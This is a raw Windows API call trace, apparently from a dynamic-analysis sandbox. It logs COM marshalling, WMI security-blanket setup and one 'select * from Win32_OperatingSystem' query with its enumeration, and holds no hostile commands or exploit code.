[0184.373] CObjectContext::ContextCallback () returned 0x0 [0184.374] IUnknown:Release (This=0x524158) returned 0x1 [0184.375] CoUnmarshalInterface (in: pStm=0x580800, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eff4 | out: ppv=0x19eff4*=0x5afe30) returned 0x0 [0184.375] CoMarshalInterface (pStm=0x580800, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5afe30, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0184.375] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee94 | out: ppvObject=0x19ee94*=0x5afe30) returned 0x0 [0184.375] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ee50 | out: ppvObject=0x19ee50*=0x0) returned 0x80004002 [0184.376] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ec6c | out: ppvObject=0x19ec6c*=0x0) returned 0x80004002 [0184.376] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19ea44 | out: ppvObject=0x19ea44*=0x0) returned 0x80004002 [0184.376] WbemLocator:IUnknown:AddRef (This=0x5afe30) returned 0x3 [0184.376] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0184.376] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e754 | out: ppvObject=0x19e754*=0x0) returned 0x80004002 [0184.377] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x5afd8c) returned 0x0 [0184.377] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5afd8c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e768 | out: pCid=0x19e768*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.377] WbemLocator:IUnknown:Release (This=0x5afd8c) returned 0x3 [0184.377] CoGetContextToken (in: pToken=0x19e7c0 | out: pToken=0x19e7c0) returned 0x0 [0184.377] CoGetObjectContext (in: riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5cd3ac | out: ppv=0x5cd3ac*=0x524090) returned 0x0 [0184.377] CoGetContextToken (in: pToken=0x19ebc8 | out: pToken=0x19ebc8) returned 0x0 [0184.377] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec54 | out: ppvObject=0x19ec54*=0x5afe14) returned 0x0 [0184.377] WbemLocator:IRpcOptions:Query (in: This=0x5afe14, pPrx=0x5afe30, dwProperty=2, pdwValue=0x19ec60 | out: pdwValue=0x19ec60) returned 0x0 [0184.377] WbemLocator:IUnknown:Release (This=0x5afe14) returned 0x3 [0184.377] WbemLocator:IUnknown:Release (This=0x5afe30) returned 0x2 [0184.377] WbemLocator:IUnknown:Release (This=0x5afe30) returned 0x1 [0184.377] CoGetContextToken (in: pToken=0x19ef40 | out: pToken=0x19ef40) returned 0x0 [0184.377] WbemLocator:IUnknown:AddRef (This=0x5afe30) returned 0x2 [0184.378] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f8 | out: ppvObject=0x19f1f8*=0x5afe0c) returned 0x0 [0184.378] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5afe0c, pProxy=0x5afe30, pAuthnSvc=0x19f248, pAuthzSvc=0x19f244, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240, pImpLevel=0x19f230, pAuthInfo=0x19f234, pCapabilites=0x19f238 | out: pAuthnSvc=0x19f248*=0xa, pAuthzSvc=0x19f244*=0x0, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240*=0x6, pImpLevel=0x19f230*=0x2, pAuthInfo=0x19f234, pCapabilites=0x19f238*=0x1) returned 0x0 [0184.378] WbemLocator:IUnknown:Release (This=0x5afe0c) returned 0x2 [0184.378] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1ec | out: ppvObject=0x19f1ec*=0x5afe30) returned 0x0 [0184.378] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x5afe0c) returned 0x0 [0184.378] WbemLocator:IClientSecurity:SetBlanket (This=0x5afe0c, pProxy=0x5afe30, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.378] WbemLocator:IUnknown:Release (This=0x5afe0c) returned 0x3 [0184.378] WbemLocator:IUnknown:Release (This=0x5afe30) returned 0x2 [0184.378] CoTaskMemFree (pv=0x5988e8) [0184.378] WbemLocator:IUnknown:Release (This=0x5afe30) returned 0x1 [0184.378] SysStringLen (param_1=0x0) returned 0x0 [0184.378] CoGetContextToken (in: pToken=0x19f1b8 | out: pToken=0x19f1b8) returned 0x0 [0184.378] CoGetContextToken (in: pToken=0x19f118 | out: pToken=0x19f118) returned 0x0 [0184.378] WbemLocator:IUnknown:QueryInterface (in: This=0x5afe30, riid=0x19f1e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19f1e4 | out: ppvObject=0x19f1e4*=0x57d190) returned 0x0 [0184.379] WbemLocator:IUnknown:AddRef (This=0x57d190) returned 0x3 [0184.379] WbemLocator:IUnknown:Release (This=0x57d190) returned 0x2 [0184.379] CoGetContextToken (in: pToken=0x19f178 | out: pToken=0x19f178) returned 0x0 [0184.379] WbemLocator:IUnknown:AddRef (This=0x57d190) returned 0x3 [0184.379] WbemLocator:IUnknown:QueryInterface (in: This=0x57d190, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f8 | out: ppvObject=0x19f1f8*=0x5afe0c) returned 0x0 [0184.379] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5afe0c, pProxy=0x57d190, pAuthnSvc=0x19f248, pAuthzSvc=0x19f244, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240, pImpLevel=0x19f230, pAuthInfo=0x19f234, pCapabilites=0x19f238 | out: pAuthnSvc=0x19f248*=0xa, pAuthzSvc=0x19f244*=0x0, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240*=0x6, pImpLevel=0x19f230*=0x2, pAuthInfo=0x19f234, pCapabilites=0x19f238*=0x1) returned 0x0 [0184.379] WbemLocator:IUnknown:Release (This=0x5afe0c) returned 0x3 [0184.379] WbemLocator:IUnknown:QueryInterface (in: This=0x57d190, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1ec | out: ppvObject=0x19f1ec*=0x5afe30) returned 0x0 [0184.380] WbemLocator:IUnknown:QueryInterface (in: This=0x57d190, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x5afe0c) returned 0x0 [0184.380] WbemLocator:IClientSecurity:SetBlanket (This=0x5afe0c, pProxy=0x57d190, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.380] WbemLocator:IUnknown:Release (This=0x5afe0c) returned 0x4 [0184.380] WbemLocator:IUnknown:Release (This=0x5afe30) returned 0x3 [0184.380] CoTaskMemFree (pv=0x598ac8) [0184.380] WbemLocator:IUnknown:Release (This=0x57d190) returned 0x2 [0184.380] SysStringLen (param_1=0x0) returned 0x0 [0184.380] CoGetContextToken (in: pToken=0x19f0f0 | out: pToken=0x19f0f0) returned 0x0 [0184.380] WbemLocator:IUnknown:AddRef (This=0x57d190) returned 0x3 [0184.380] IWbemServices:ExecQuery (in: This=0x57d190, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x19f308 | out: ppEnum=0x19f308*=0x59a438) returned 0x0 [0184.420] IUnknown:QueryInterface (in: This=0x59a438, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f158 | out: ppvObject=0x19f158*=0x59a43c) returned 0x0 [0184.420] IClientSecurity:QueryBlanket (in: This=0x59a43c, pProxy=0x59a438, pAuthnSvc=0x19f1a8, pAuthzSvc=0x19f1a4, pServerPrincName=0x19f19c, pAuthnLevel=0x19f1a0, pImpLevel=0x19f190, pAuthInfo=0x19f194, pCapabilites=0x19f198 | out: pAuthnSvc=0x19f1a8*=0xa, pAuthzSvc=0x19f1a4*=0x0, pServerPrincName=0x19f19c, pAuthnLevel=0x19f1a0*=0x6, pImpLevel=0x19f190*=0x2, pAuthInfo=0x19f194, pCapabilites=0x19f198*=0x1) returned 0x0 [0184.420] IUnknown:Release (This=0x59a43c) returned 0x1 [0184.420] IUnknown:QueryInterface (in: This=0x59a438, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f14c | out: ppvObject=0x19f14c*=0x5af930) returned 0x0 [0184.421] IUnknown:QueryInterface (in: This=0x59a438, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f138 | out: ppvObject=0x19f138*=0x59a43c) returned 0x0 [0184.421] IClientSecurity:SetBlanket (This=0x59a43c, pProxy=0x59a438, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.422] IUnknown:Release (This=0x59a43c) returned 0x2 [0184.422] WbemLocator:IUnknown:Release (This=0x5af930) returned 0x1 [0184.422] CoTaskMemFree (pv=0x5988e8) [0184.422] IUnknown:QueryInterface (in: This=0x59a438, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed44 | out: ppvObject=0x19ed44*=0x5af930) returned 0x0 [0184.423] WbemLocator:IUnknown:QueryInterface (in: This=0x5af930, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ed00 | out: ppvObject=0x19ed00*=0x0) returned 0x80004002 [0184.423] WbemLocator:IUnknown:QueryInterface (in: This=0x5af930, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eb1c | out: ppvObject=0x19eb1c*=0x0) returned 0x80004002 [0184.423] IUnknown:QueryInterface (in: This=0x59a438, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8f4 | out: ppvObject=0x19e8f4*=0x0) returned 0x80004002 [0184.424] WbemLocator:IUnknown:AddRef (This=0x5af930) returned 0x3 [0184.424] WbemLocator:IUnknown:QueryInterface (in: This=0x5af930, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e654 | out: ppvObject=0x19e654*=0x0) returned 0x80004002 [0184.424] WbemLocator:IUnknown:QueryInterface (in: This=0x5af930, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x0) returned 0x80004002 [0184.424] WbemLocator:IUnknown:QueryInterface (in: This=0x5af930, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x5af88c) returned 0x0 [0184.424] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5af88c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e618 | out: pCid=0x19e618*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.425] WbemLocator:IUnknown:Release (This=0x5af88c) returned 0x3 [0184.425] CoGetContextToken (in: pToken=0x19e670 | out: pToken=0x19e670) returned 0x0 [0184.425] CoGetContextToken (in: pToken=0x19ea78 | out: pToken=0x19ea78) returned 0x0 [0184.425] WbemLocator:IUnknown:QueryInterface (in: This=0x5af930, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb04 | out: ppvObject=0x19eb04*=0x5af914) returned 0x0 [0184.425] WbemLocator:IRpcOptions:Query (in: This=0x5af914, pPrx=0x5af930, dwProperty=2, pdwValue=0x19eb10 | out: pdwValue=0x19eb10) returned 0x80004002 [0184.425] WbemLocator:IUnknown:Release (This=0x5af914) returned 0x3 [0184.425] WbemLocator:IUnknown:Release (This=0x5af930) returned 0x2 [0184.425] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0184.425] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0184.425] WbemLocator:IUnknown:QueryInterface (in: This=0x5af930, riid=0x19f088*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x59a438) returned 0x0 [0184.425] IUnknown:AddRef (This=0x59a438) returned 0x4 [0184.425] IUnknown:Release (This=0x59a438) returned 0x3 [0184.425] IUnknown:Release (This=0x59a438) returned 0x2 [0184.425] WbemLocator:IUnknown:Release (This=0x57d190) returned 0x2 [0184.425] SysStringLen (param_1=0x0) returned 0x0 [0184.425] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f354 | out: puCount=0x19f354*=0x2) returned 0x0 [0184.425] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f350*=0x0, pszText=0x0 | out: puBuffLength=0x19f350*=0xf, pszText=0x0) returned 0x0 [0184.425] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f350*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f350*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.425] CoGetContextToken (in: pToken=0x19f190 | out: pToken=0x19f190) returned 0x0 [0184.425] IUnknown:AddRef (This=0x59a438) returned 0x3 [0184.425] IEnumWbemClassObject:Clone (in: This=0x59a438, ppEnum=0x19f350 | out: ppEnum=0x19f350*=0x599ad8) returned 0x0 [0184.426] IUnknown:QueryInterface (in: This=0x599ad8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f20c | out: ppvObject=0x19f20c*=0x599adc) returned 0x0 [0184.427] IClientSecurity:QueryBlanket (in: This=0x599adc, pProxy=0x599ad8, pAuthnSvc=0x19f25c, pAuthzSvc=0x19f258, pServerPrincName=0x19f250, pAuthnLevel=0x19f254, pImpLevel=0x19f244, pAuthInfo=0x19f248, pCapabilites=0x19f24c | out: pAuthnSvc=0x19f25c*=0xa, pAuthzSvc=0x19f258*=0x0, pServerPrincName=0x19f250, pAuthnLevel=0x19f254*=0x6, pImpLevel=0x19f244*=0x2, pAuthInfo=0x19f248, pCapabilites=0x19f24c*=0x1) returned 0x0 [0184.427] IUnknown:Release (This=0x599adc) returned 0x1 [0184.427] IUnknown:QueryInterface (in: This=0x599ad8, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f200 | out: ppvObject=0x19f200*=0x5af830) returned 0x0 [0184.427] IUnknown:QueryInterface (in: This=0x599ad8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1ec | out: ppvObject=0x19f1ec*=0x599adc) returned 0x0 [0184.427] IClientSecurity:SetBlanket (This=0x599adc, pProxy=0x599ad8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.428] IUnknown:Release (This=0x599adc) returned 0x2 [0184.428] WbemLocator:IUnknown:Release (This=0x5af830) returned 0x1 [0184.428] CoTaskMemFree (pv=0x598a98) [0184.428] IUnknown:QueryInterface (in: This=0x599ad8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ede8 | out: ppvObject=0x19ede8*=0x5af830) returned 0x0 [0184.429] WbemLocator:IUnknown:QueryInterface (in: This=0x5af830, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eda4 | out: ppvObject=0x19eda4*=0x0) returned 0x80004002 [0184.429] WbemLocator:IUnknown:QueryInterface (in: This=0x5af830, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ebc4 | out: ppvObject=0x19ebc4*=0x0) returned 0x80004002 [0184.429] IUnknown:QueryInterface (in: This=0x599ad8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e99c | out: ppvObject=0x19e99c*=0x0) returned 0x80004002 [0184.430] WbemLocator:IUnknown:AddRef (This=0x5af830) returned 0x3 [0184.430] WbemLocator:IUnknown:QueryInterface (in: This=0x5af830, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e6fc | out: ppvObject=0x19e6fc*=0x0) returned 0x80004002 [0184.430] WbemLocator:IUnknown:QueryInterface (in: This=0x5af830, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e6ac | out: ppvObject=0x19e6ac*=0x0) returned 0x80004002 [0184.430] WbemLocator:IUnknown:QueryInterface (in: This=0x5af830, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6b8 | out: ppvObject=0x19e6b8*=0x5af78c) returned 0x0 [0184.430] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5af78c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e6c0 | out: pCid=0x19e6c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.430] WbemLocator:IUnknown:Release (This=0x5af78c) returned 0x3 [0184.430] CoGetContextToken (in: pToken=0x19e718 | out: pToken=0x19e718) returned 0x0 [0184.430] CoGetContextToken (in: pToken=0x19eb20 | out: pToken=0x19eb20) returned 0x0 [0184.430] WbemLocator:IUnknown:QueryInterface (in: This=0x5af830, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebac | out: ppvObject=0x19ebac*=0x5af814) returned 0x0 [0184.430] WbemLocator:IRpcOptions:Query (in: This=0x5af814, pPrx=0x5af830, dwProperty=2, pdwValue=0x19ebb8 | out: pdwValue=0x19ebb8) returned 0x80004002 [0184.430] WbemLocator:IUnknown:Release (This=0x5af814) returned 0x3 [0184.430] WbemLocator:IUnknown:Release (This=0x5af830) returned 0x2 [0184.430] CoGetContextToken (in: pToken=0x19f0f8 | out: pToken=0x19f0f8) returned 0x0 [0184.430] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0184.430] WbemLocator:IUnknown:QueryInterface (in: This=0x5af830, riid=0x19f128*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f124 | out: ppvObject=0x19f124*=0x599ad8) returned 0x0 [0184.430] IUnknown:AddRef (This=0x599ad8) returned 0x4 [0184.431] IUnknown:Release (This=0x599ad8) returned 0x3 [0184.431] IUnknown:Release (This=0x599ad8) returned 0x2 [0184.431] IUnknown:Release (This=0x59a438) returned 0x2 [0184.431] SysStringLen (param_1=0x0) returned 0x0 [0184.431] IEnumWbemClassObject:Reset (This=0x599ad8) returned 0x0 [0184.431] CoTaskMemAlloc (cb=0x4) returned 0x596cd8 [0184.431] IEnumWbemClassObject:Next (in: This=0x599ad8, lTimeout=-1, uCount=0x1, apObjects=0x596cd8, puReturned=0x2313014 | out: apObjects=0x596cd8*=0x5460f8, puReturned=0x2313014*=0x1) returned 0x0 [0184.488] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9a8 | out: ppvObject=0x19e9a8*=0x5460f8) returned 0x0 [0184.488] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e964 | out: ppvObject=0x19e964*=0x0) returned 0x80004002 [0184.488] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e784 | out: ppvObject=0x19e784*=0x0) returned 0x80004002 [0184.488] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e55c | out: ppvObject=0x19e55c*=0x0) returned 0x80004002 [0184.488] IUnknown:AddRef (This=0x5460f8) returned 0x3 [0184.488] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2bc | out: ppvObject=0x19e2bc*=0x0) returned 0x80004002 